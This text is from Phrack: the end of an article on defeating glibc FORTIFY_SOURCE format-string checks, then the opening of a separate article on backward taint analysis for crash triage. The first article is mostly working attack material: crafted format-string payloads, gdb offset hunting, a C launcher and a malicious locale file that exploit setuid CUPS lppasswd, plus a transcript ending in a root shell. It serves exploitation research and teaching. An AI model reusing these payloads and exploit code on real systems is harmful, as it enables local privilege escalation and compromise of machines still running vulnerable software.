   0x08048509 <+57>:  mov    %ebx,0x4(%esp)
   0x0804850d <+61>:  movl   $0x1,(%esp)
   0x08048514 <+68>:  call   0x80483c4 <__printf_chk@plt>

First, calls to printf, etc get rerouted to __*_chk in your compiled binary
and the first argument of :flag: is passed as 1.

A.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/debug/printf_chk.c

/* Write formatted output to stdout from the format string FORMAT.  */
int
___printf_chk (int flag, const char *format, ...)
{
  va_list ap;
  int done;

  _IO_acquire_lock_clear_flags2 (stdout);
  if (flag > 0)
    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;

  va_start (ap, format);
  done = vfprintf (stdout, format, ap);
  va_end (ap);

  if (flag > 0)
    stdout->_flags2 &= ~_IO_FLAGS2_FORTIFY;
  _IO_release_lock (stdout);

  return done;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The function sets the _IO_FLAGS2_FORTIFY bit to ON in the FILE* structure 
to enable the FORTIFY checks. This is sort of clever, as the bit will 
always get toggled on when entering dangerous functions. You can not 
universally disable the mechanism very easily. But this itself does not 
actually guarantee any kind of security.

Under libio/libio.h the following secondary flags are defined:

#define _IO_FLAGS2_MMAP 1         //fopen 'm' mmap access mode
#define _IO_FLAGS2_NOTCANCEL 2    //open/read/write should not be used as
                                    thread cancellization points
#ifdef _LIBC
# define _IO_FLAGS2_FORTIFY 4     //enable fortify security checks
#endif
#define _IO_FLAGS2_USER_WBUF 8    //wide buffer (2-byte) support funk
#ifdef _LIBC
# define _IO_FLAGS2_SCANF_STD 16  // %a support for scanf
#endif

Disabling the entire flags buffer should not be too much trouble, but may
lead to some inconsistencies if the file stream pointer is opened with 'm' 
in the mode parameter.

The astute reader will be wondering about functions such as vsnprintf, 
which require no file stream pointer. Well, glibc provides an okay 
solution. A file stream pointer is made on the stack with a callback that 
writes to a buffer instead of a file descriptor. This file stream pointer 
is then passed along to vfprintf.

Now, with the _IO_FLAGS2_FORTIFY bit set, there are two protections that 
are enabled.

B. Protection #1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/stdio-common/vfprintf.c

   LABEL (form_number):
\
      if (s->_flags2 &
_IO_FLAGS2_FORTIFY)                                    \

{                                                                     \
          if (!
readonly_format)                                              \

{                                                                 \
              extern int __readonly_area (const void *,
size_t)               \

attribute_hidden;                                             \

readonly_format                                                 \
                = __readonly_area (format, ((STR_LEN (format) +
1)            \
                                            * sizeof
(CHAR_T)));              \

}                                                                 \
          if (readonly_format <
0)                                            \
            __libc_fatal ("*** %n in writable segment detected
***\n");       \

}                                                                     \
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

If the format string payload containing a %n is located in a writeable 
memory area such as the stack or BSS or DATA or the heap, this patch will 
detect it and error out. Besides a DoS, this patch renders format strings 
pretty harmless.


C. Protection #2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/stdio-common/vfprintf.c
    /* Determine the number of arguments the format string consumes.  */
    nargs = MAX (nargs, max_ref_arg);

    /* Allocate memory for the argument descriptions.  */
    args_type = alloca (nargs * sizeof (int));
    memset (args_type, s->_flags2 & _IO_FLAGS2_FORTIFY ? '\xff' : '\0',
            nargs * sizeof (int));
    args_value = alloca (nargs * sizeof (union printf_arg));
    args_size = alloca (nargs * sizeof (int));
..
    for (cnt = 0; cnt < nargs; ++cnt)
..
      switch (args_type[cnt])
..
        case -1:
          /* Error case.  Not all parameters appear in N$ format
             strings.  We have no way to determine their type.  */
          assert (s->_flags2 & _IO_FLAGS2_FORTIFY);
          __libc_fatal ("*** invalid %N$ use detected ***\n");
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The effect of this second patch is that all of the arg_types are set to -1
by default. If there are any argument holes in between which do not get 
processed, they are left as -1. So the effect is that:

  %4$x

would be invalid but

  %4$x %2$x %1$x %3x

would be okay.

To be honest, I do not really see this as some huge security improvement 
but more of a nuisance. It does not really stop infoleaks much. Maybe they
wanted to prevent people from exploiting 8 character format strings, 
because those are really common in the wargaming scene.


------[ 2. Bypassing FORTIFY_SOURCE

Now, if you were paying attention, you saw a bunch of allocas in 1-A. That 
:nargs: variable, that is the calculated maximum number of arguments. If a 
fmt str has simple arguments, the value is just that number. But, if a fmt 
str uses width arguments or positional parameters (often called direct 
parameters in other format string articles), then those also factor into 
the maximum :nargs: value

As an example in this string,
%x %x %x %13981938$x,

13981938 is the :nargs: value being passed to the alloca functions in code
snippet 1-C.

Do not get too excited. This is not enough for generic control. 
Unfortunately, we can not do the same stack shifting as in [4] since we are
in a context past the initial stack frame allocation. At the epilogue of 
the function, a base register will be used to collapse the stack, making 
stack shifting less useful without being accompanied by memory clobbering. 
This is true of many of the architecture's C compilers. They pretty much 
all implement some sort of easy stack clean-up with a base register, so 
alloca itself is difficult to attack.

Instead, it is the operations that use the allocated memory that must be
exploited. The integer overflow can be used to trigger all sorts of memory
trespasses.

One other thing to do is shift the stack into the heap using the alloca. 
This also turns out to be difficult because of those memset operations.

But we do have a loss of state. And as always, from a loss of state new
opportunites arise. We are in the land of undefined. Hi mom and dad!

This article will use one such trespass opportunity to bypass 
FORTIFY_SOURCE. It should be noted that others exist, but may be a bit 
harder to utilize than this one.

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Arbitrary 4-byte NUL overwrite.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: stdio-common/vfprintf.c

    /* Fill in the types of all the arguments.  */
    for (cnt = 0; cnt < nspecs; ++cnt)
      {
      /* If the width is determined by an argument this is an int.  */
      if (specs[cnt].width_arg != -1)
        args_type[specs[cnt].width_arg] = PA_INT;

enum
{                               /* C type: */
  PA_INT,                       /* int */
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Quick summary of the code:
args_type[ ATTACKER_OFFSET ] = 0x00000000;

Explanation:
The above code is required to process width arguments that are passed in as
parameters.

For example:

        %1$*269096872$x

Effectively does:
        //specs[cnt].width_arg = 269096872
        args_type[specs[cnt].width_arg] = 0

..which, if your stack is set up just right, can toggle off that 
_IO_FLAGS2_FORTIFY bit in the `stdout` FILE structure.

Remember that :args_type: was one of the buffers allocated on the stack in
the alloca snippet above in 1-C and is an array of an integer base type.

Care must be taken as the alloca becomes a bit of a problem when nargs gets
set to a large value. This will likely shift the stack to somewhere 
unmapped. The next push or call instructions would result in a crash, 
preventing proper exploitation.

So the key constraints around :nargs: are as follows:

1) the stack must be shifted somewhere sane
2) the memset operation must not hit an unmapped page.

The easiest way to meet these two contraints is to use an integer overflow.
Since no bounds checking occurs on :nargs:, you can artificially keep the
stack in-place with this: `%1073741824$`. No specifier is really required 
and you can end it with just a $ sign. The second contraint is also 
satisfied because the memset will be called with a length parameter of 0.

The details of the allocas are a little bit more complex if you look at the
assembly. For our purposes, they roughly end up doing:

esp -= nargs * (4)
esp -= nargs * (12)
esp -= nargs * (4)

The 1073471824*4 happens to be 0 when truncated into a 32-bit integer. This
and other factors of 1073471824 prove to be sufficient for side-stepping 
the alloca constraints.

This concludes the arbitrary 4-byte NUL overwrite.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


The first patch (1-B) can be disabled by clearing that IO_FLAGS2_FORTIFY 
bit in the file stream pointer. Typically it will be the only flag enabled 
on the file stream pointer. In the unlikeley case that one of the other 
bits was set, for example _IO_FLAGS2_MMAP, inconsitencies may arise when 
the file stream pointer is closed. This may or may not affect 
exploitability.

We will now revisit the second part of the patch. It makes any format 
string exploit less flexible. The loop on nargs has to be terminated early 
to avoid the assert and the libc_fatal when a "hole" in the arguments is 
discovered. By hole, I am referring to the code in (1-C) which checks the 
:args_type: value against -1. Remember that the fortify source patch won't 
let you access %5$x without also accessing %1$? %2$? %3$? and %4?. That is 
what is meant by 'hole' in this context.

The termination of that loop can coincidentally happen all by itself if the
stack is aligned correctly. The loop will hit out of bounds of the alloca 
created buffers and self terminate when :nargs: is set to 0, provided that
:nargs: is stored by the compiler on the stack. If it fails to do this, an 
assert() statemet will be triggered, preventing exploitation.

Or, we can reuse the 4-byte NUL write can be used to bypass the loop 
reliably.

One instance of a successful bypass can then be performed in two easy 
steps.

 1. Turn off the IO_FORTIFY_SOURCE bit to allow %n from a writeable address
 2. Set nargs=0 to skip the value-filling loop.

Note that bypassing the loop via #2 requires us to dig further down the 
stack to find our user input since the same loop is responsible for filling
in the args_value array. If you have ever attempted to exploit a format
string by truncating a pointer and reusing it as destination on glibc, you 
probably failed because of that args_value array.

------[ 3. Exploitation

In standard phrack style we will first do this on a test binary and then on
a real-world binary to disprove any accusations of academic tendencies, 
like thought experiments. Feel free to skip to part B.

------------[ A. Dummy Test Program for clarity

Note: ASLR is disabled and the program has an executable stack.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//File: test.c
//gcc -D_FORTIFY_SOURCE=2 -O2
int main(){
  char buf[256];
  fgets(buf, sizeof(buf), stdin);
  printf(buf);
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

captain@planet:~/research/fmt/article$ ./a.out
%n
*** %n in writable segment detected ***
Aborted
captain@planet:~/research/fmt/article$ ./a.out
%4$x
*** invalid %N$ use detected ***
Aborted

Oh nooO! Scary format string protections are making everything hurt.

ENABLE POWER MORPHING LINUX SHARING COMMUNITY POWER
----
Alright remember the process kids.
1. Disable fortify source
2. Set nargs = 0
3. Enjoy the %n

So first, lets figure out where that arbitrary 4-byte NUL write is on our
system. We will pick some ridiculous desination, like %1$*269168516$. If it
doesn't crash, keep incrementing that by about 20000.

So we'll send the following as our investigative payload. The first part
should trigger the NUL write. The second part should keep the stack sane.

%1$*269168516$x %1073741824$

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ gdb -q ./a.out
Reading symbols from /home/captain/research/fmt/article/a.out...(no
debugging symbols found)...done.
(gdb) r
Starting program: /home/captain/research/fmt/article/a.out
%1$*269168516$x %1073741824$

Program received signal SIGSEGV, Segmentation fault.
0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*269168516$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1735
1735  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/i $pc
=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
(gdb)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The fortify source bit will be somewhere inside of the file stream pointer
over at s=0x29f4e0.

    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;

On this target machine, it happens to be @+60

0x29f51c <_IO_2_1_stdout_+60>:  0x00000004

Since the operations here are relative, ASLR is not too big of an issue and
once you find your offset, it's pretty consistent (YMMV).

Here is the equation
$ecx + $eax*4  should = 0x29f51c

(gdb) p/d ((0x10029f51c-$ecx) & 0xffffffff)/4
$11 = 269145003

Counting starts from 0, so add 1 to that for the payload.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ gdb -q ./a.out
Reading symbols from /home/captain/research/fmt/article/a.out...(no
debugging symbols found)...done.
(gdb) break vfprintf
Function "vfprintf" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (vfprintf) pending.
(gdb) r
Starting program: /home/captain/research/fmt/article/a.out
%1$*269145004$x %1073741824$

Breakpoint 1, _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:210
210  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) tbreak *(vfprintf+11489)
Temporary breakpoint 2 at 0x1888f1: file vfprintf.c, line 1735.
(gdb) c
Continuing.

Temporary breakpoint 2, 0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0,
format=0xbffeb2dc "%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)")
    at vfprintf.c:1735
1735  in vfprintf.c
(gdb) x/i $pc
=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
(gdb) x/wx $ecx+$eax*4
0x29f51c <_IO_2_1_stdout_+60>:  0x00000004
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

This operation has to be repeated for :nargs:. The easiest way to locate
:nargs: is to pick a value you know (0xdeadbeef), and find it on the stack 
or just pick it up where it gets loaded before the alloca code.

%1$*3735928559$x

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Program received signal SIGSEGV, Segmentation fault.
0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
1721  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/wx $ebp-0x4bc
0xbffeadcc:  0xdeadbeef
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

p/d (0xbffeadcc-$ecx)/4+1
= 472 for me

Disabling both :nargs: and fortify source : [%*472$ %1$*269145004$
%1073741824$]

Well, that's not actually true. It depends on what your buffer looks like.
For example if you attempt to do:

%49150u %4847$hn %*472$ %1$*269145004$ %1073741824$

The first two parameters will cause the stack to shift and the values have 
to be recalculated based on the size of that $hn offset. This gets a bit 
hairy, but with some grunt work you'll be done. The next task is finding
a good way to hijack flow control.

One good vector happens to be a call to free shortly after the %n write.

=> 0xb7d4f3f8 <_IO_vfprintf_internal+2024>:  mov    -0x4bc(%ebp),%edi
=> 0xb7d4f3fe <_IO_vfprintf_internal+2030>:  mov    %edi,(%esp)
=> 0xb7d4f401 <_IO_vfprintf_internal+2033>:  call   0xb7d28988 <free@plt>
=> 0xb7d28988 <free@plt>:  jmp    *0x24(%ebx)
(gdb) x/wx $ebx+0x24
0x29f018:  0x001b8e60

We will overwrite the upper 16-bits to point into the stack
(0x001b->0xbfff).
Write Dest: 0x29f01a

One way to smuggle this value is using a command line argument.

%49150u %4847$hn %*13996$ %1$*269158528$ %1073741824$

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Program received signal SIGSEGV, Segmentation fault.
0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
1721  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/wx $ebp-0x4bc
0xbffeadcc:  0xdeadbeef
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

So after some fenagling you'll reach something like this:

A great improvement would be automation via instrumentation or mapping
out the stack shifting very tightly.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ export PAY=`python -c 'print
"\xcc"*4096*20'`
captain@planet:~/research/fmt/article$ (python -c 'print "%49150u %4847$hn
%1$*269168516$x %1$*13996$x %1073741824$"')
                                      | ./a.out `echo -ne "a ccc ddbbb
\x1a\xf0\x29 fffff"`
...
            Trace/breakpoint trap (core dumped)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%


------------[ B. The real world exploit

===========================================================================
===========================================================================
===========================================================================

CUPS locale() vulnerability.

Ronald Volgers noticed that lppasswd used user-specified locales. A few
distributions (debian, ubuntu, fedora?) ship lppasswd setuid root. Is this
awesome? yes

ls -al lppasswd
-rwsr-xr-x 1 root root 19144 2010-07-07 00:56 lppasswd

To exploit it, you just export LOCALEDIR to a place where 
$LOCALEDIR/C/cups_C.po holds the format strings for the various printfs in 
lppasswd.

This exploit turns out to be hard for a few reasons. The first, it is non
interactive. That is, the format string can not be used for an info leak to
bypass ASLR. The second limitation is that lppasswd creates a LOCK file, so
any weaponized exploit must be highly reliable. Luckily this second one can
be bypassed with resource limits.

File: sploit_filz.c
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <sys/resource.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/time.h>

int main(int argc, char *argv[])
{
  struct rlimit rara;
  int keke[4096*4];
  char test[0x10000];
  char *args[] = { "./lppasswd", 0 };
  char *env[] = { "LOCALEDIR=./", &keke, test, 0};
  int riri;
  int jmp = 0xbffdc66c;

  memset(test, 0x01, sizeof(test));
  test[0x10000-1] = 0x00;

  for(riri = 0; riri < sizeof(keke)/sizeof(int); riri+=4){
    keke[riri+0] = jmp+2;
    keke[riri+1] = jmp+2;
    keke[riri+2] = jmp;
    keke[riri+3] = jmp;
  }

  rara.rlim_max = rara.rlim_cur = atoi(argv[1]);
  setrlimit(RLIMIT_NOFILE, &rara);

  execve("./lppasswd",args,env);
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There is also one important difference between the test program and 
lppasswd. The vulnerability inside libcups is triggered by vsnprintf. 
Internally, vsnprintf creates a fake file stream pointer on the stack and 
then passes it to vfprintf.

This is actually pretty good news in terms of bypassing ASLR as the file
stream pointer is a fixed offset from the format string structures, which 
glibc allocates on the stack.

The vulnerable function in libcups follows.

File: cups/cups/langprintf.c
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
int          /* O - Number of bytes written */
_cupsLangPrintf(FILE        *fp,  /* I - File to write to */
          const char  *message,  /* I - Message string to use */
          ...)      /* I - Additional arguments as needed */
{

...

  va_start(ap, message);
  vsnprintf(buffer, sizeof(buffer),
            _cupsLangString(cg->lang_default, message), ap);
  va_end(ap);
..
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

With ASLR disabled, the best option is to go after the return address. In 
the callstack for vfprintf:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
Breakpoint 1, _IO_vfprintf_internal (s=0xbffdc68c,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u
%7352$hx %49150u %7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x
%1$*14620$x %1073741824$", ap=0xbffdefe8 "\243>\344\267-\021\021") at
vfprintf.c:210
210  in vfprintf.c
(gdb) bt
#0  _IO_vfprintf_internal (s=0xbffdc68c,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ...
#1  0xb7df2bf4 in ___vsnprintf_chk (s=0xbffde7bc "", maxlen=2048, flags=1,
    slen=2048,
    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ....
#2  0xb7f96544 in vsnprintf (fp=0xb7e68580,
    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
    at /usr/include/bits/stdio2.h:78
#3  _cupsLangPrintf (fp=0xb7e68580,
    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
    at langprintf.c:125
#4  0x0011116a in main (argc=1, argv=0xbffdfee4) at lppasswd.c:316
(gdb)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The second return address lends itself very well to exploitation. The 2nd
parameter points to user input. This is highly useful when overwriting the 
saved return address.
The address can be pointed to &system or __libc_system or do_system, and 
the old 2nd argument will become the argument to system.

Above in the resource limit setting code, the enivornment is filled with
pointers to that return address::  int jmp = 0xbffdc66c;

    keke[riri+0] = jmp+2;
    keke[riri+1] = jmp+2;
    keke[riri+2] = jmp;
    keke[riri+3] = jmp;

NX Bypass: C/cups_C.po
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
msgid "lppasswd: Unable to open password file: %s\n"
msgstr "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u %7352$hx
%49150u \
%7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x %1$*14620$x
%1073741824$"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The first part executes a command. The next 4 arguments were padding but
removing them would have required some recalculations.

These two writes redirect control flow to system by overwriting the least
and most significant half-words of the saved return address.

%14263u %7352$hn %27249u %7353$hn

And the last part is used to bypass FORTIFY_SOURCE:  
%1$*14951$x %1$*14620$x %1073741824$.

Overall, things are pretty hairy, but they work with some massaging.

captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -l lppasswd
-rwsr-xr-x 1 root root 18867 2010-06-06 01:26 lppasswd
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
ls: cannot access /tmp/sh: No such file or directory
captain@planet:~/research/fmt/cups-1.4.2/systemv$ cp /bin/bash /tmp/sh
captain@planet:~/research/fmt/cups-1.4.2/systemv$ gcc -o sf sploit_filz.c
sploit_filz.c: In function ?main?:
sploit_filz.c:13: warning: initialization from incompatible pointer type
sploit_filz.c:20: warning: incompatible implicit declaration of built-in
function ?memset?
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ./sf 4
Enter old password:
Enter password:
Enter password again:
sh: %49150u: not found
Segmentation fault
captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
-rwsr-xr-x 1 root root 818232 2010-07-07 01:26 /tmp/sh
captain@planet:~/research/fmt/cups-1.4.2/systemv$ /tmp/sh -p
sh-4.1# id
uid=1337(captain) gid=1337(captain) euid=0(root)
groups=4(adm),20(dialout),24(cdrom),29(audio),30(dip),44(video),46(plugdev)
,104(lpadmin),112(netdev),115(admin),118(pulse-access),120(sambashare),
1000(captain)


------------[ C. TODO- ASLR

The author has failed to make an ultra reliable exploit for defeating both
ALSR and an NX stack. Part of what makes it difficult is all of the moving
parts.

In this case ASLR makes things hairy for two reasons. Both the stack and 
libc (and the text) are shifting. They are randomly offset from each other.
In the above exploit, two values need to be known. The first is the 
location of the saved return address. The second is the address of glibc. 
By applying the resource limits, it is still possible to brute force this 
vulnerability, but it requires patience with 24-bits of entropy.

Anyway, the following two methods have been attempted.

1) Copy (read+write) primitive using width arguments.

The width argument can be used to read a value from memory and write it
somewhere.

%1$*100$u will read the 100th argument's value, and write that many spaces.
This is presumably the reason why %n was introduced in the first place. The
copy would look like this:

%1$*100$u %2$101$n

Author's Verdict: Too hairy
The copy write primitive does not seem to work reliably under the fortify
source loss of state. Exact reasons have not been yet determined, and a way
to stabilize them may exist. In addition, once a copy operation is 
performed, the internal printf counter must be reset by writing a value 
numerous times. The easiest way to do this would be to print out the same 
value '256' times and reduce write width to one-character at a time. 
Writing the same value '256' times ensures that the lowest byte of the 
internal counter will be 0.

2) Repurpose double stack pointers

For lppasswd, stack double-pointers exist that can be repurposed. For %n to
work, a pointer is needed. The idea behind this avenue is to use the first 
pointer to redirect the second pointer to the return address.

Author's verdict: Using the pointers is reliable, but ASLR has enough 
entropy in the the correct offset to the return address is unreliable. The 
best acheivement was 24-bits of entropy, 12-bits for the return address and
12-bits for &system. Only one exploit seemed to work, and the author was 
unable to reproduce even after a night of testing.

===========================================================================

------[ 4. Afterword

It is the author's opinion that it is quite amazing vfprintf even compiles
in the first place. Briefly, it should be noted that there are more angles 
of attack in the vfprintf code that are a bit more complicated. Although 
quite messy. Here is one example, if a target is using the deprecated 
features of vfprintf to register their own format string specifiers, an 
attacker can get arbitrary code execution without needing %n. Execution 
without %n may even be possible with the jump table implementations...

This article is dedicated to runixd and beist, the top scoring two of the
first three loller skaterz. Mad greetz to the even better lollerskaterz 
dropping from rofl copters. Surf the chaos dudes!

Many thanks to the phrack staff for their help.
And also real hackers who make me blush.

Thanks for reading. Have phun!

[0] http://msdn.microsoft.com/en-us/library/ms175782.aspx
[1] http://www.securityfocus.com/bid/1634
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0393
[3] http://www.phrack.org/issues.html?issue=59&id=7&mode=txt
[4] http://www.phrack.org/issues.html?issue=63&id=14
[5] http://althing.cs.dartmouth.edu/local/formats-teso.html
[6] http://www.loko.nu/formatstring/format_string.htm


--------------------------------------------------------------------------------


                             ===Phrack Inc.==

		Volume 0x0e, Issue 0x43, Phile #0x0a of 0x10

|=----------------------------------------------------------------------=|
|=-------=[ Dynamic Program Analysis and Software Exploitation ]=-------=|
|=---------------=[ From the crash to the exploit code ]=---------------=|
|=----------------------------------------------------------------------=|
|=----------------------------------------------------------------------=|
|=---------------=[ By BSDaemon                              ]=---------=|
|=---------------=[ <bsdaemon *noSPAM* risesecurity_org>     ]=---------=|
|=----------------------------------------------------------------------=|
|=-------------------------=[ August 14 2010  ]=------------------------=|
|=----------------------------------------------------------------------=|

					"Don't matter what do you beleive
happens when someone dies, the life always continues through the others who
remember."
				Md. Sergio da Silva Branco
				Beloved father and my hero.  God bless
you!


------[  Index

  0 - Abstract
    0.1 - Keywords

  1 - Introduction
    1.1 - Paper structure

  2 - Concepts and Additions 
    2.1 - Taint Analysis
	2.1.1 - Taint Sources
	2.1.2 - Intermediate Languages and Tainted Sources
	2.1.3 - Explosion of watched data
    2.2 - Backward Taint Analysis
	2.2.1 - From the crash to the exploit

  3 - Existent solutions and comparisions

  4 - Future and other uses

  5 - Acknowledgements

  6 - References

  7 - Sources 

------[ 0 - Abstract

This article provides a compilation of the state of the art in program
analysis, a real implementation based on an extension to the Microsoft 
Debugger for tracing and a GUI application to actually do such 
analysis and help determine not just if something is exploitable, but
actually to guide you in such exploitation process.  It uses backward taint
analysis to map from the crash back to the original data and define what 
part of the data crashed the application, and how such data was transformed
during the execution.

It does not discuss how to create a Microsoft Debugger extension, and is not 
even going to citate anything related to that.  It is all about software 
exploitation, so I completely ignore other motivations for program analysis 
(although I know those motivations are really important too).  A deep
understanding of software exploitation is required in order to really take 
advantage of such tool.


------[ 0.1 - Keywords

Dynamic Analysis, Taint Analysis, Data Flow, Intermediate Language, Reverse 
Engineering, Software Exploitation.

------[ 1 - Introduction

Program Analysis is a hot topic.  Many people are discussing this subject 
even more given the amazing numbers of crashes the fuzzers are finding
nowadays [1] [2].

This article uses program analysis as the way of making a computational
system reason automatically (or at least with little human assistance)
about the behavior of a program and draw conclusions that are somehow
useful.

In a world where thousands of crashes do exist and are easily found in very
important softwares, the classification of exploitability of such bugs is 
the first priority.  It is known that it is impossible (or inviable or 
nobody wants to, or whatever other excuse you find to not fix your 
software) to fix all the bugs such fuzzers are finding, so, at least, 
companies want to fix (or exploit) the ones that are exploitables.

The problem is that the only available solution to analyze such crashes are
provided by Microsoft (named !exploitable or bang exploitable) [3][4] and 
are not really useful to create actual exploits or to better understand the
problem, but just to give a static classification (exploitable, probably
exploitable, not exploitable or unknown).

Even people with source code access are sometimes relying on such tools to 
determine the exploitability of a given path (sometimes it is easier to 
analyze a bug without getting into the messy code structure).

Taint Analysis concepts and challenges are going to be explained in order 
to determine what is being done by the proposed solution and to provide a 
better idea of future and areas of improvements.

---[ 1.1 - Paper structure

In Chapter 2 I discuss about the concepts needed in the solution, like what
is program flow analysis, taint analysis, what are the taint sources that 
can be used and how to map between the assembly code and the taint places 
in order to propagate the taint.  Also in this chapter I talk about the 
explosion of watched data when you are tainting from the beginning of the 
execution and why backward taint analysis is the solution for this problem.

Chapter 3 compares the provided solution with the Microsoft !exploitable 
software. 

Chapter 4 defines the future of this area and some expected improvements in
the future.   

Chapter 5 is the acknowledgements to everybody who contributed 
directly or indirectly to this article.  

Chapter 6 includes the references and some additional references (not 
directly cited in the article, but very useful to learn more) and, finally,
Chapter 7 is the most juicy part and includes all the sources for two 
different projects (the Microsoft Debugger extension which is the main 
focus of this article and a HeapMonitor for Linux-ARM that I also comment
in this paper).

------[ 2 - Concepts and Additions

This is the core of the article and will give the state-of-the-art in 
program analysis focusing in software exploitation.  Here I discuss
all the challenges in this area and all the concepts needed in order to
understand the attached code (Section 7).

Vulnerability exploitation experience is not required to understand this
particular section.  Vulnerability exploitation experience is mandatory
to actually use the offered solution, since the implementation only helps
the analysis process and does so automating the process of validation of
what the attacker control that influences a crash and what are the code
traces to get to the crash point.

---[ 2.1 - Taint Analysis

Taint Analysis is one kind of program flow analysis and the idea behind 
such analysis of a program flow in the context of this article is to define
the influence of external data over the analyzed application.

Since the information flows, or as usually said, is copied to or influences
other data, there is a need to follow this influence in order to determine
the control over specific data (registers, memory locations).  This is a
requirement to later determine the exploitability.

To follow the information flow, I need to keep track over all the taint
sources, and propagate such tracking to influenced data.

That means that when a tainted location is used in such a way that a value
of other data is derived from the tainted data (like in mathematical
operations, move instructions and others) I need to mark the other location
as tainted as well.  This is called taint propagation and is defined with 
the following transitive relation:

	- If information A is used to derive information B:
		A->t(B) -> Direct flow
	- If B is used to derive information C: 
		B->t(C) -> Direct flow
	- Thus: A->t(C) -> Indirect flow

These transitive steps between operations are called 'flows' and can be 
analyzed one by one or in a block (like in the example above, A->t(C)).  

